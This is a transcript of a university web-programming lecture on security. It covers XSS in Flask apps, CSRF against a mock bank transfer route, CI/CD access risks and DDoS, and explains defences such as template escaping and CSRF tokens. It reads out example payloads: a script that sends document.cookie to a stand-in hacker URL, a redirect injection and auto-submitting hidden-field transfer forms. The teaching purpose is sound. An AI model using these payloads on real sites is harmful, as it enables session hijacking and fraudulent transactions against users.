In addition, they're often
used for rate limiting,
where if you're worried about
someone over using an API
or abusing your server of making
thousands upon thousands of requests
in a short period of
time, you can rate limit
and say, well, I only want
you to be able to make
x number of requests per hour.
And if you have an API
key, then it's pretty easy
to implement this idea of rate
limiting because all you have to do
is keep track inside of a
table somewhere this API key
has used 28 requests in the last hour,
so they're hitting up on their limit.
And so if they use any
more, we should just
stop allowing them to use the API key
until it refreshes for the next hour,
for instance.
And so in your project, you might
not have needed to use an API key,
but anytime you want to deal with
potentially authenticated data
or you want to rate limit, then you'll
want to think about using an API key
like you did have to use
with the good reads API
in order to take advantage
of features like rate
limiting or authenticating
particular routes
to make sure that only
certain users have the ability
to access particular routes.
Questions about that?
All right.
In that case, we'll take a short
break and when we come back,
we'll take a look at JavaScript and look
at the many different kinds of security
vulnerabilities that
come about when we start
introducing JavaScript and client-side
code into our web applications.
Welcome back.
So we're at about the
midway point in the course,
and then we started to
talk about JavaScript.
And so JavaScript, if you
recall, was the language
that we were using in
order to write code
on the client side, code that was
actually running inside the user's
browser and not on the server
where Flask or Django was running,
for instance.
And this leads to a whole new host of
potential security vulnerabilities.
So let's start to chat about these.
What could go wrong?
What sorts of exploits
could happen, can you
think of, when we start to introduce
JavaScript into the equation?
Code that can run inside
the user's browser.
Yeah?
AUDIENCE: When we [INAUDIBLE]
information, [INAUDIBLE] even that it
can change.
Like someone's address [INAUDIBLE]
that changing someone's
address to someone else and
using JavaScript [INAUDIBLE]..
BRIAN YU: Great.
So JavaScript has all these event
handlers that we've talked about,
whether on load or on click,
that can do various things.
And potentially, if someone
clicks on something in code that
does something malicious
that's able to run,
it can make something
potentially bad happen.
And we'll take a look at at least
one example of that definitely
later on today.
Other things that could
potentially go wrong?
There are a lot of potential
security vulnerabilities here.
So let's just toss out some ideas.
What would we want to
avoid happening now
that we have JavaScript code
that can run inside the browser?
AUDIENCE: Someone might redirect from
the site you're on to another site.
BRIAN YU: Great.
Certainly, someone might try
and redirect from the site
you're on to some other site.
That we've looked at ways that
we can use JavaScript in order
to redirect someone from
one place to another.
And if we're not careful,
that JavaScript code
might be able to redirect the user
to someplace that the user doesn't
necessarily want to be.
And so we'll definitely look at
an example of that later on, too.
So that's definitely one
potential vulnerability.
Yeah?
AUDIENCE: So like with HTML and
CSS, it was all static, just
like what a user sees.
But with JavaScript,
you can actually use
it to run code on someone's machine.
So if you write a malicious code, you
can [INAUDIBLE] someone's computer.
BRIAN YU: Exactly.
So with HTML and CSS,
we didn't really need
to have to worry about code
actually running for the most part
because it was just here's
the way that things look.
And certainly we were able to
use that to try and trick users
by creating a link that looked
like it went to Bank of America
but actually went to my
version of some different site.
But when it comes to
JavaScript, now we really
have the potential for malicious code
to be running on the user's web browser.
And so how does that code get
to the user's web browser?
How does malicious code enter into
some other seemingly benign site,
and why might those
be potential exploits?
So where we'll start is by looking at
one potential JavaScript exploit, which
is quite common, called
cross-site scripting.
Where the idea of
cross-site scripting is
that we're going to try and
look for a vulnerability
where we can-- in the same
way that in the SQL case,
we were able to inject whatever SQL code
we wanted into being run on a database,
a malicious user, if they are able to
send the right link to the right person
and get them to click
on a link for instance,
are able to get some arbitrary
JavaScript code to run inside
of the user's web browser.
And so let's take a look at a
very simple Flask application.
This is in fact, the entire
Flask application, the contents
of application.py, for example.
And there is in fact, a
major cross-site scripting
vulnerability inside this
application, and see if we
can tease apart where exactly that is.
So at the beginning, we import
Flask, and we import request,
which we'll need access to later.
We create a new Flask application
inside the current module.
Then we define a default route,
just when you go to the slash route.
It calls this index function
that returns Hello, world.
And then down here, we
have app.errorhandler(404).
So you may not have seen
this before, but Flask
has built in error handlers
that are specific functions that
run when specific error codes happen.
So 404, you might
recall, is the error code
for not found when someone
goes to a page that
doesn't exist on the web server.
And what Flask can do for you is say
whenever a 404 error happens on the web
server, go ahead and run this function,
which is going to supposedly render
my 404 error page.
And you can do the same
thing for error 500,
for example, internal server
errors, or 403, forbidden errors,
or any other errors
status code you want.
If you want particular code
to run, a particular template
to be displayed when a particular error
code happens on your web application,
you can use a Flask's
built in error handler
to be able to handle those
particular situations.
So what we have here is a function
that is supposed to handle 404 errors,
that handles a page not found error.
It calls this page not found
function, and all the page not
found function is going to
do is say return not found.
And then it's going to append
request.path, where request.path
is what the URL was that
the user tried to go
to that resulted in the 404 error.
And so what might that mean?
It means that if a user
goes to /foo, for example,
then what's going to happen is--
I'll go ahead and go into
cross-site scripting zero
and go ahead and run
this web application,
running that very same code.
So I get hello, world when
I go to the default route,
don't type in anything after the URL.
But if I go to /foo for example,
what do I expect to see?
AUDIENCE: Error not found.
BRIAN YU: Great.
Not Found: foo, because not found
was the initial message that
happens when I do a 404 error message.
And then /foo is the path, the
request path that I tried to request.
And so this might be pretty typical.
That if I go to a URL
that doesn't exist,
I probably expect a page like
this to show up that says, sorry,
this route, this path that
you were trying to request,
couldn't be found on the web server.
So what can go wrong there?
Here's the web application,
where's the security vulnerability?
Yeah?
AUDIENCE: So someone maybe could
somehow inject a script path
into your request path location.
BRIAN YU: Great, exactly.
So the vulnerability is
with this request path.
That if someone is able to inject
JavaScript code into this request
path, now suddenly, the
thing that I'm returning
is not found colon,
potentially some JavaScript
code that is then going to be run.
And you might imagine that if a hacker
now is able to take one of these URLs
and convince a user to click on a link
that takes them to a URL like that,
that takes them to this particular
function in my Flask application, now
suddenly this hacker is able to
run whatever JavaScript code they
want to inside of the web application.
So what might that look like?
Instead of just going to /foo as the
route that returns a benign not found
/foo on the page, what if, for instance,
the user typed in this as their URL?
Where after the slash, they type script
alert hi /script, end JavaScript.
Now this is going to be
the request path, which
means what gets put into
return not found colon,
we're going to return
some page that says not
found and then this JavaScript code.
This JavaScript code
that says alert, hi.
So this is code now that
if someone clicks on,
might potentially be
executed by this web browser,
an example of cross-site scripting.
That someone is able
to send me this link,
and they were able to inject random
JavaScript, whatever they want,
into this particular application.
So let's try it.
So again, going to /foo,
says Not Found, foo.
If I do a /bar, it says Not Found bar.
What's going to happen if I
do script alert hi /script?
So here's my URL now.
Rather than type in foo or bar,
I've added to this JavaScript code
to the URL and I'm going
to try and run that.
What's going to happen?
AUDIENCE: An alert.
AUDIENCE: Get an alert.
BRIAN YU: We'll get an alert.
That's what we expect
to happen, at least.
In fact, Chrome is getting
pretty good at this.
Chrome and other web browsers
have built-in security features.
So Chrome actually stopped me.
It gave me this page that
says, this page isn't working.
Chrome detected unusual
code on this page
and blocked it to protect
your personal information,
for example, passwords, phone
numbers, and credit cards.
And if we look down here, it
says error, blocked by XSS,
or cross-site scripting, error blocked
by cross-site scripting auditor.
So Chrome's got some
built-in feature here
that's checking for potential
cross-site scripting,
like what we just tried to
do, and it's blocking me
from getting access to this page.
And this defends against certainly
some kinds of cross-site scripting,
but not all.
And we'll see an example of one which
bypasses Chrome in just a moment.
And certainly you can't
rely on all web browsers
to be able to have this built-in
cross-site scripting auditor built in,
so these are definitely still
things to be careful about.
So what would happen if this auditor
didn't exist, if it wasn't in place?
We can actually find out.
That Chrome actually lets us, if
I run Chrome from the command line
and run Chrome dash,
dash, disable xss auditor,
I can run Chrome without running
the cross-site scripting auditor.
Just turn that auditor off.
And now if I go here, slash script
alert high, just like I did before,
and press Return, now I
get the alert that says hi.
I've injected JavaScript
code into this page,
and after I press OK, now
it says not found, slash.
And of course that
seemed relatively benign,
that an alert certainly showed up.
JavaScript code was running, but
nothing was really compromised.
So where might this go wrong?
Where could this really
become a problem?
Can anyone think of why this might
really start to become an issue?
Injecting arbitrary JavaScript code.
Yeah?
AUDIENCE: An executable
could be put in there.
BRIAN YU: Great.
Any executable thing could be
put into this JavaScript code
so that any code could run.
And in particular, that
means that anything
could happen on the web
browser, including potentially
secure information being exposed.
And so in the case of Flask and
when we talked about logging
in and logging out, we've
talked about this a little bit,
how does the browser know--
or when the server is-- when
someone logs into a website
and the server says, OK,
this user is now logged in.
When I go and click on another button,
how does the browser or the server
still know that I'm the one
logged into the website?
AUDIENCE: Session.
BRIAN YU: The session, certainly.
And how does that--
or what do we know from the--
what's happening on the client side?
How does it know that it's
coming from the same place?
That it's the same user
that's making that request?
AUDIENCE: It's in a cookie.
BRIAN YU: Inside of a cookie, yes.
So that we've got some cookie, some
information, stored in our computer.
That is the cookie that tells the
server-- it's like a hand stamp that
says, yes, this is me.
Show me the same page that
I was looking at before.
I'm still logged in.
And we talked about if someone were
ever to get access to that cookie,
then they would be able to login as us.
They could pretend to be us and
therefore use our credentials,
and the server wouldn't be
able to tell the difference
because that cookie is a
valid cookie, for instance.
And so let's take a look
at now, if it wasn't
this script that was being passed
into the application, but this script.
Slightly different,
slightly more complicated.
We've got /script, so
we're starting JavaScript.
We say document.write, which
is just a way of writing
new information, new text, into
the HTML content of the page,
and we're adding an image,
which seems sort of strange.
Image source equals hacker
URL, where hacker URL
is some URL of some hacker's website.
And cookie equals, and then
we added document.cookie,
which is going to represent the
cookie for this particular web
browser, this particular page.
And then end angled bracket, and
that's the end of the JavaScript.
We effectively just added an image tag
into the page where the source of that
image is supposedly
hacker_url?cookie=document.cookie.
Why is that a problem?
What's just happened here?
Yeah?
AUDIENCE: You're going to
hit the hacker's website
and pass your cookie as a [INAUDIBLE].
BRIAN YU: Exactly.
We're going to hit the hacker's
website, and any time we're
making a request to that server,
that server is potentially
logging exactly what URL was requested.
In fact, if you've been using
Flask or Django all this time
and you've looked at
the terminal window,
you've probably noticed
over here that you've
been able to see every single
request that's been made.
Here was a GET request to the URL slash,
here's a GET request to the URL /foo,
here's a GET request to the URL /bar.
And so if our hacker is carefully
monitoring all of the requests
to the server over here at hacker URL,
they're going to notice something like
someone made a request to
hacker_url?cookie= and then some
cookie, right?
So by injecting this JavaScript
code into the user's web browser
and having this run, they've
added this image tag that's
going to make a request
to hacker_url and is
going to pass this information,
that cookie-- so now
the cookie that was
originally on your computer,
someone else now has access to
because you've now just put it inside
of some request that's going elsewhere.
And that's why Chrome was giving us
that error, that warning message about,
well, be careful.
We tried to block you from being able
to see this page because it looks
like someone might be able to
inject JavaScript code that
might be able to steal your
passwords or other information.
Because any information, we can just
send in a request to some other URL,
in this case.
And so this is really the danger of
cross-site scripting, this ability
to inject JavaScript
into any arbitrary page.
Questions about any of that?
AUDIENCE: Question.
BRIAN YU: Great.
Yeah?
AUDIENCE: What did they do with cookie?
I mean--
BRIAN YU: Good question.
What can we do with the cookie?
So once you have the cookie,
you could potentially
use that to login as
someone else, for instance.
Or any secure information that's stored
in that cookie, you'd have access to.
So if there are secure pieces
of data stored in the cookie,
then that's potentially a vulnerability.
And we talked about in
last lecture, I believe,
how Flask gives you
the option of, if you
want to, storing all of your session
information inside of a cookie.
Which means secure information about
the contents of your shopping cart
or how much money you
have in your account
might be stored inside
of that cookie, which
could potentially be a vulnerability.
But even if that's
not there, at minimum,
that cookie is a way of
convincing the server
that someone else is who you are.
If they steal your cookie, they can
convince the server that they are you.
And then they can have
access to your account
on whatever web application this
is and potentially do whatever
they want with that information.
AUDIENCE: Would that be time bound
with the-- like with that session,
that you'd have to use
it for the next session?
BRIAN YU: Good question.
Would it be time bounded?
It quite possibly could be.
That if I were to log
out for instance and now
the server forgets about that
cookie, now suddenly we've
been able to avert this
scenario, or this is no longer
going to be a valid way.
But if they can convince me to
click on the URL again the next time
I log into the site, now it suddenly
becomes a problem all over again.
And so we'll want to think
carefully about, when
we're using JavaScript inside
of our web applications,
is there a place where
we might be vulnerable.
In fact, our original web application
didn't even have any JavaScript in it
at all.
It was really just Flask
and returning text.
But still, a malicious hacker was able
to inject JavaScript into our page
just because we were including that
raw JavaScript in there as well.
So these are certainly
things to be mindful of.
And both Flask and Django
have ways of making sure
that when you're inserting information,
it's inserted in a safe way such
that we escape any potential
JavaScript characters to help
avoid these types of situations.
But these are just good
things to be mindful of
and be careful about as we go about
designing these web applications.
Let's go ahead and take another look at
another example of cross-site scripting
and how it can happen.
What I will look at now is a
slightly more complicated site,
and this is one that Chrome
is actually not going
to be able to fully defend against.
And what cross-site
scripting one is is it's
a web application that is going
to display a message list.
It's sort of a message board.
We saw a brief example of something
that looked very similar to this
when we were first
taking a look at Flask
and how we're able to
render templates and such.
This one actually uses a database.
And I'll show you what it looks like.
We'll look at application.py.
So I have a SQLite
database that I'm going
to be using that's just going to
store a whole bunch of messages
so that it can be on this
public message board.
And effectively, I have just one
route, a default index route,
where if I'm just viewing
this page by a GET request,
just asking to see the page,
I skip over this post stuff,
and I just get all the messages.
Selecting star from messages, just get
all the messages in the message board.
And then go ahead and render
this template, index.html passing
in those messages.
And then, if it's a
post request, then I'm
going to get whatever the contents
of the message that I'm trying to add
is, whatever came in through
this form, and then I'm
going to insert into my messages
table, whatever that content is.
So if I type in a new message and insert
it, I submit that via a post request.
It gets added to my list
of growing messages.
And otherwise, if I'm just
requesting the page normally,
or even after something
is done being inserted,
I'm going to request
for all the messages
by selecting it all from the
database and then rendering it inside
of index.html.
So what does that look like?
The result is that using just
these couple of lines of code,
I now have this Message List site
where I can type in foo as a message,
submit that.
And now the message foo is
there, bar goes in there,
and this gets added to
the public message board.
And of course, if I were to close
this site and I were to open it again
or someone else were to open
it again on their computer,
because it's all drawing from the same
database, now I go back here again.
Foo and bar are still there, so
those messages are still there.
And so where is the opportunity for
cross-site scripting attacks here?
AUDIENCE: You could store
a script in the database.
BRIAN YU: Exactly.
We could store a script in the database,
a script could be one of the messages.
Such that that JavaScript
code gets just inserted
into the HTML contents
of this page here,
and then it could potentially run.
So if I were to add a message that
was like, script alert hi /script,
and then submit that, well, what seems
to happen here is that when I try
and submit it, Chrome
is giving me some error.
It's giving me that same error as
before, this page isn't working.
Chrome detected unusual code.
Here's that cross-site scripting
auditor saying, hey, wait a minute,
something's wrong.
And the reason it was able
to do that is because when
I was submitting my request,
there was some JavaScript
included inside that request.
So Chrome was able to
detect that something
might be a little fishy there, that I
was submitting this JavaScript along
with the request, and then
it was coming back to me.
So what about if I were to close
the page and open it again.
Now I'm just requesting the page.
There's no JavaScript in the
URL, and all that's happening
is that it's extracting
information from the database
and displaying it onto the page.
And so Chrome now has
no real way of knowing
that there is any potential
cross-site scripting involved.
So I go here, and now
I get the hi alert.
They were able to run arbitrary
JavaScript on this page.
And then I see foo and bar
and then just some empty thing
because that's where the
JavaScript code was before.
It's like here's an example of us being
able to add a cross-site scripting
vulnerability that we were able to take
advantage of, exploit, by just adding
JavaScript code into here as well.
And so I haven't been committing
these changes to the database.
I haven't been saving them.
So if I run this again, we'll
be reset back to a clean slate.
So if I go back here, I see
a blank message list again.
So what are some other things
that I could potentially do?
Well, I might be able to say
someone does foo and then bar.
Maybe I could say--
I just want to display
whatever contents I want.
So I'm going to add JavaScript
that says document.body.innerH
TML=whateverpageIwant/script,
and I submit that.
Again, Chrome blocks it
the first time because it
detects that, with
this request at least,
there was something fishy going along.
But when the next request comes in,
when the next person comes along,
they open this page, now
message list is gone.
I don't see foo and bar or
any of those other messages.
I just see whatever the contents of
the page that I wanted to show was.
And that gets displayed
to the user here.
So that's certainly one
thing they could do.
Certainly stealing cookies is another
thing that could happen in the same way
that we saw it in the last example.
Or someone could say, you know what?
Let's just take the user to
an entirely different site.
Let's take them to my site where I can
now try and steal information from them
as well by saying
window.location equals,
and I can say cs50.github.io/web.
And so now this window.location
equals some URL is the JavaScript code
that I'm running.
I'll submit that.
And when the next user comes along
and they try and go to my page,
now they're suddenly redirected.
I've taken them somewhere else entirely.
And if that other new page looks
sort of similar to the old page,
they might be tricked into
thinking it is the same old page.
And they might be interacting with it,
typing in their credentials, usernames,
and passwords, and now this hacker is
able to gain access to that as well.
And so how do we defend against
these sorts of cross-site scripting
vulnerabilities?
Well, Flask is actually
pretty good about this.
And by default, when you're rendering
a template, like render template,
and you're plugging in some information,
Flask will, by default, automatically
escape that stuff for you.
It will say, you know what?
This is stuff that could
potentially be JavaScript
or could potentially be unsafe, so
we'll go ahead and escape it and protect
that information for you.
Certainly not all
frameworks are like that,
and certainly if you're just
doing string concatenation
like we were in the previous
example, then that's
not something we can really rely on.
But if we take a look
at templates index.HTML,
in order for this to really work
the way that I wanted it to,
I had to add this bar
safe in here, where
this is my way of telling Jinja2,
the template rendering engine,
don't worry about escaping anything.
Just display the contents.
And so in reality, if you were
to just do message.content,
Flask would be smart enough to try
and defend against this for you.
But it is something
that you just want to be
careful about anytime you have text that
you think is safe, is it really safe?
Is there a potential for JavaScript
code to be injected into there?
And if you're generating the templates
yourself by string concatenation
like we were in the previous example,
is there an opportunity for cross-site
scripting to appear there as well?
And so that's certainly one of
the major vulnerabilities that
can come about as we start
to deal with JavaScript
and using JavaScript inside
of our web applications.
Questions about that?
All right.
Let's move on and take a look
at the next web framework
that we talked about, which
in particular was Django.
And so when we first
took a look at Django,
we looked at how we would go
about doing the same things we
did in Flask, about rendering
templates and displaying pages
and using server side
logic to handle requests.
And in particular, we looked at forms.
And when we did look at
forms, I had to add a line
to one of the forums that
seemed a little bit strange.
Does anyone remember what that line was?
Yes?
AUDIENCE: CSRF token.
BRIAN YU: Yeah, we added
the CSRF token line to it.
And I said don't worry about that
for now, we'll talk about it later.
And now is that time that we're
going to start talking about it.
CSRF stands for Cross-Site
Request Forgery.
And this is yet another
type of attack that people
can use where Cross-Site
Request Forgery is
the idea of trying to forge a
request to some other website
in order to take some action that the
user might already be logged into.
And so what might be an example of that?
Let's say, for instance, that
someone was logged into their bank,
on their bank's website.
And I, on some other website,
wanted to try and trick
the user into transferring
some money to me, for instance.
How might I to go about doing that?
Well, you might imagine
very simply that I
might start by creating a
website, my own website, that
looks something like this.
I have the body of my website,
I have an a href, a link.
And this link goes to
HTTP:yourbank.com/transfer,
and then some arguments, some GET
parameters, transfer to Brian, amount,
2,800, for instance.
And if the bank is set
up in this such way,
where making a GET request to /transfer
by passing in as arguments who
you're transferring to and what
the amount is initiates a transfer,
now I've been able to create a
sort of security vulnerability.
That if this is what's
displayed on my page
and I can convince someone to click
here, so long as they're already
logged in to yourbank.com,
then clicking on that link
automatically will
initiate that transfer.
So if yourbank.com is
set up in that way,
such that transferring money just
happens via this GET request,
then that's certainly a way
that I could trick someone
into transferring money to me.
What are some ways to
protect against that?
What can yourbank.com do to make sure
that we can't do something like this?
Such that someone else
can't just add a link
that says click here and
then automatically initiate
the transfer of money.
Yeah?
AUDIENCE: When you're doing
an operation like this,
you want to send some
token with it so it
knows that it was you that's doing
it, and you're not being played.
BRIAN YU: Great, some token.
And certainly, we'll see more about
that when we get to some more details.
But right now, this is just a
link that you're clicking on.
So we're just clicking on a link.
And what else could the bank do?
But that's certainly one good answer.
AUDIENCE: Not expose a service
with a GET request like that.
BRIAN YU: Great.
Not expose a GET request like this.
That could certainly be something.
And in fact, this is something
that's generally good web practice.
That you don't want GET requests to
be modifying the state of something,
like modifying who has
what amounts of money.
That generally, all of that should
be inside of a POST request, such
that it really needs to be a form
submission that needs to happen
in order to allow that to happen.
And of course, maybe this
isn't such a big deal
because I'm saying, click here.
And so as long as the user is smart
and as long as they're careful and they
hover over the link and see,
oh, this is going to take me
to yourbank.com/transfer, then I'm safe.
So how might a hacker get around that?
In order to make it such that the
user doesn't need to click on,
click here, in order to
initiate that transfer?
AUDIENCE: They don't need
[INAUDIBLE] in other website.
BRIAN YU: Great.
So hypothetically, we could just
add some JavaScript code here
that says that rather than a link
that someone needs to click on,
we'll just add some JavaScript
code that will automatically
redirect the user there, for instance.
And that could be something
that could happen as well.
But then at minimum, the user
is taken to that other web site,
and now they can see that
that transfer has happened.
But there are even more subtle
ways about doing this as well.
We looked at, in a
couple of slides ago, we
talked about how image tags,
for instance, can be used.
Where if you provide the link to
whatever the source of the image is,
that will automatically trigger
a request there as well.
And so you might imagine that instead of
structuring my hacking page like this,
if I tried this as my exploit instead,
just render an image where the source
of that image is yourbank.com/transfer
and here's what I'm transferring.
Now, no need for a user to
click on any link at all.
As soon as they go to my
page, your web browser
is going to make a request
to this URL, and that's
going to potentially start
to initiate a transfer.
And so that's certainly a
potential security vulnerability.
And so someone suggested
OK, well, rather
than make your bank take all of
its transfers via GET requests,
we might instead want to do
this via making it a form
that someone needs to
submit, some POST request.
That it can't just be you clicking
on a link or you rendering some image
that's going to trigger
the transfer of funds.
So maybe you might imagine that
I could do something like this.
This might be an exploit that
I can use now on my site.
That I create a form whose
action is yourbank.com/transfer,
the method is POST, and now I
have these hidden input type,
input type equals hidden.
This is an input type that's just
not going to appear to the user.
The user is not going
to see this at all.
It's an input type named to, whose value
is who I want to transfer the money to.
I have an input type that is the
amount, which is the amount of money
that I want to transfer.
And then I have an input
type called submit,
which is just going to be a
button that says click here.
And so all the user is going to see,
if this code is rendered, is what?
What does the user see?
AUDIENCE: Click here.
BRIAN YU: Exactly.
They just see this one
input field, this button
that says click here, because
these two input fields are hidden.
And of course, click
here could say anything.
It could say next page, for instance.
Something benign that looks like
something you might reasonably
just click that would
take you somewhere else,
when in reality, it's submitting a
form that's going to transfer funds
to someone and to some amount.
But of course, maybe we're OK
because if the user is careful
and they're not going to
click on the button, then--
and then if they're not
clicking on a button
when they don't know what that button
actually does, then they're safe,
how might a hackers still get around
this and still be able to get the user
to submit this form?
Even without the user
clicking on a button.
Yeah?
AUDIENCE: Can you do a POST
request from JavaScript code?
BRIAN YU: Can you do a POST
request from JavaScript code?
Certainly you can.
We actually looked at
ways we could do that
before when we were talking about
AJAX and making requests to a server
in order to get more
information from the server
after we've already loaded the page.
So that's certainly one option as well.
Another way we could do it is just
by adding this additional line
to the body, on load--
when you're done loading--
here's what the body should do.
Document.form0, get the first form
in the document and submit it.
Just by adding that single
line of JavaScript code,
now as soon as the user loads this
page, this form will be submitted,
and then that will initiate
the transfer at yourbank.com
So certainly, this isn't a
good scenario we want to be in.
This is CSRF, Cross-Site
Request Forgery,
where we are able to create
a request to some other site
and pretend that request was
originally from yourbank.com in order
to initiate the transfer.
And so long as I know what
parameters that request takes,
I'm able to forge that request.
And so the solution, as
was pointed out, which
is what Django uses and a bunch
of other web frameworks use,
is to add a special token,
effectively a password.
Where the idea is that you would
write this inside of your Django code,
and if you were to look at the HTML
that gets rendered as a result, what's
actually happening is that
in place of CSRF token,
the web server, the
Django web server, is
inserting some long string, some
effectively a token or a password,
that is associated with
this specific form.
Such that when the
user submits that form,
the token is submitted along with it.
And the server can then check
to see does this token match
the token that I initially sent out.
And only, if and only if
they match, then we're
going to actually initiate the transfer.
That way, no other website is able to
forge a request to my bank's transfer
web site because they're not
going to know what the token is.
It's going to be a new token
every time we make a request,
and that's going to allow us to avoid
a situation where someone might be able
to-- from some other site--
make a request that attacks the
/transfer route in this case.
So that's why Django has
that CSRF token in place.
It's to prevent against
those kinds of attacks.
Flask on its own doesn't, by default,
have this sort of protection built in,
although there are extensions that
allow you to add on to a Flask
in order to help add security for
this particular type of attack
into Flask as well.
So these are also just
good things to be aware of,
potential security
vulnerabilities that can exist,
and things you'll want to think
about as you design your application.
Can just anyone initiate a transfer
request by submitting a POST request
or do they need some special
tokens, potentially changing,
as they go about doing that as well.
Questions about the
security vulnerabilities
we've talked about so far?
OK.
Let's go ahead and move on from Django
and talk a little bit about CI/CD.
And so this is relatively
recent, where we
were talking about how we
might leverage CI tools,
where we looked at Travis in
particular, as a tool that we
can use in order to run tests
in order to deploy our code.
And we connected Travis
to GitHub, whereby
Travis was able to run tests on our
GitHub code inside of our repositories
and then check to make sure that
those tests, in fact, passed.
What vulnerabilities appear there?
Or are things that we
should be considering
when we start to think about that?
Yeah?
AUDIENCE: You're giving Travis
access to your codebase.
BRIAN YU: Yeah, exactly.
We're now giving Travis
access to our codebase.
So whereas before, our code was
stored on GitHub and GitHub alone,
such that, certainly, if
GitHub was compromised,
now our code is compromised as well.
Now we've given Travis access to
all of our private repositories
on GitHub potentially,
such that now there
are two points at
which being compromised
could result in our
code being compromised.
Whereby if GitHub is compromised,
our code is compromised.
But likewise, if Travis is
compromised for some security reason,
then our code might also be
compromised because Travis
has access to our GitHub account.
And so any time you
deal with accounts that
are able to grant permission to
other applications or other accounts
to get access to that information,
that's where there's potentially
room for security vulnerabilities.
And so we see that with
GitHub, where GitHub
is allowed to authorize other
applications if you give them
permission to have access
to your information as well.
But you see this in
other websites as well.
In fact, Facebook does this, and
been under controversy recently,
for the idea that it can grant
third party applications the right
to look at your user information.
And if you grant a third
party application that right,
now if any one of those is compromised,
then your own user information
is compromised.
And so it's the same
type of thing, where
you want to be careful about if
you're giving access to one website,
giving one website access
to your user information
or your code and your repositories,
then what other services also
have the same access to
that information as well.
And so if you're the one
designing the services,
you want to be careful about what
other services you give access to.
And if you're the one
using GitHub or Travis,
you also want to be careful about
how many different third party
services have access to all of your
private repositories for example.
And so as a final example, as
we move on to, just recently
last week, in terms of the
topics we were talking about,
we talked a little bit about
scalability and the idea
that once we've written our application
and we're ready to deploy it,
we need to think about how we're going
to scale this application as more
and more users start working about it.
We talked about load balancers and
having multiple, different servers.
And we talked about, in
particular, that any server
is a finite machine that can only
handle a certain number of requests
in a certain amount of time.
Maybe x requests per second for
instance, where x is some number.
And what potential vulnerabilities
or exploits come about there?
What could a potentially
malicious hacker
try to do knowing the constraints
of what our systems are capable of?
AUDIENCE: Like [INAUDIBLE]
can start DDoSing your system,
sending a bunch of
requests at the same time.
BRIAN YU: Exactly.
Sending a bunch of requests.
So if a computer, for instance, is
going to-- if our server, for instance,
can only handle 1,000 requests
per second, and one hacker,
on their computer, decides that they
want to try and shut down our system--
maybe they're going to send
1,001 request in a single second
to our server.
And this is what we'll generally call
a DoS, or denial-of-service attack,
where a user tries to send a
request after request after request
in an attempt to overload
our servers in order
to try and make sure that we're
unable to handle all the requests that
are coming in.
And if we're handling all of the
requests coming in from one user,
then we're potentially not
able to handle requests
coming from other people as well.
Of course, this probably
isn't too much of an issue
if we've got dozens
and dozens of servers
and only one computer is the
one making a lot of requests.
Which is why the next
thing you mentioned
was also a potential exploit
or a potential concern,
which is that what if it's not just
one, single computer, but a whole botnet
of a bunch of computers that are all
trying to make requests to the same web
server at the same time?
This is what we generally
call a DDoS attack,
a Distributed
denial-of-service attack, where
we have a lot of
different computers that
are all trying to make requests at the
same time to our same web application.
And as a result, it's quite
likely that the web application
might be overloaded by all these
requests and be unable to handle it.
And so what are ways of potentially
dealing with a DDoS attack?
Of a bunch of people trying to
make requests at the same time,
trying to shut down our server by
overloading it with too many requests?
Yeah.
AUDIENCE: Limit how many
requests they can make.
BRIAN YU: Try and limit how
many requests they can make.
So certainly one potential
approach to dealing
with DDoS attacks is to try and add
some sort of filtering system of trying
to-- before it actually gets to
the server, try and filter and see
is this a valid request or not?
And maybe there are heuristics
you can use for that.
And certainly, if you can
limit people, that if you
notice that this particular
computer is making a lot of requests
at the same time or in a
short amount of time, then
maybe you can put
downward pressure on that
by blacklisting that particular user.
So that's certainly something
we could think about as well.
But in the end of things,
it really often does
come down to just a battle of
resources, of who has more resources.
Is it the adversary or is it yourself?
And so oftentimes this is not
something that you can just
deal with at the web
application level, but it's
something that needs to be dealt with
at the server level or the ISP level.
Where you really need to make
sure that your infrastructure is
in place, especially if you're
dealing with a large web application,
to make sure that you're able to
handle all of that potential traffic.
And so certainly, the end idea
of this and of all the topics
we've talked about so far today
is that through all of the things
we've talked about, whether it was
just a simple, static HTML web page
or dealing with scalability and Flask
and Django and other web services,
or JavaScript and how we might be able
to inject JavaScript code into our web
application, there are security
vulnerabilities everywhere.
And it's definitely a
good idea to be thinking
about what those
vulnerabilities might be
and how we might be able to
deal with them when they arrive.
And so now let's think about
moving beyond just this course
as we arrive at the
conclusion of the course.
What comes next?
If this is still something
that interests you,
if web programming is
something that you're
interested in continuing
to learn more about,
we were just really barely
scratching the surface here
when it came to programming
with Python and JavaScript.
We looked at Flask and Django in
particular as the web frameworks
that we were using in order to build
and design and deploy our websites.
But those certainly are
not the only options.
There are other web frameworks
that are gaining popularity
in modern times, nowadays,
that are definitely
worth looking into if this is the
sort of thing that interests you.
Generally, we can divide them
into server-side frameworks,
the sort of frameworks that are going
to be running like Flask or Django
on our web server somewhere,
where Express.js and Ruby on Rails
are examples of some server-side
frameworks that we'll commonly use.
Actually, sorry.
This is mislocated a little bit.
And client-side frameworks include
things like React or Angular
that are common frameworks that
are used on the client-side now,
in order to generate
components that are displayed
that are able to interact with
the web server in some way.
And so these are definitely
things to look at as well.
And then when it comes to actually
taking your web application
and deploying it to
the internet, if that's
something that's of
interest to you as well,
there are a whole
number of other services
that you can use as well for that.
So GitHub Pages was one
that we looked at way
at the very beginning of the
course, which is generally
used if we just want to deploy some
static content to a page like HTML
and CSS and JavaScript.
And that's totally
fine for GitHub Pages.
But if we want to run a web server,
we're going to need a little bit more
than that.
And so we did look a
little bit at Heroku
when we were thinking
about using our database.
So Heroku is a service that allows us to
host web applications on the internet.
It makes it relatively easy to take
a Flask or Django web application
and host it.
And in particular, it makes it very
easy to hook that up to a database,
for instance, in order to connect
it with a PostgreSQL database,
as we did in one of the
early projects in order
to allow us to deploy that as well.
But if you're looking for even more
power and even more feature-filled web
hosting than that, you can take a look
at Amazon Web Services or Google Cloud
or Microsoft Azure, all of which
offer a lot of different services
for taking web applications and
deploying them to the internet.
They often will use Docker,
which we looked at a little while
back when we were talking about
containerizing our application
and bundling together our web
application with the database
and any other services that might be
involved in running that application.
And so certainly these
are services that you
can use as well if you're thinking
about actually building out
one of these web applications
and deploying it to the internet.
And these larger services
like AWS or Microsoft Azure,
they have the ability to take care
of some of the scalability concerns
that we were talking about.
The ability to add
load balancers that are
able to make sure that
we have enough servers
to make sure that we're able to
handle all the requests coming in
from all the different users.
And they do auto scaling such
that as more users come in,
we can increase the number of servers or
decrease the number of servers as well.
And so these are increasingly
popular tools and technologies
that are ways of allowing people to
take web applications that they're
building on their own computers and
ultimately deploy them to the internet.
Before we wrap up, I just want
to make sure to say thank you
to all the people that were
really instrumental in making
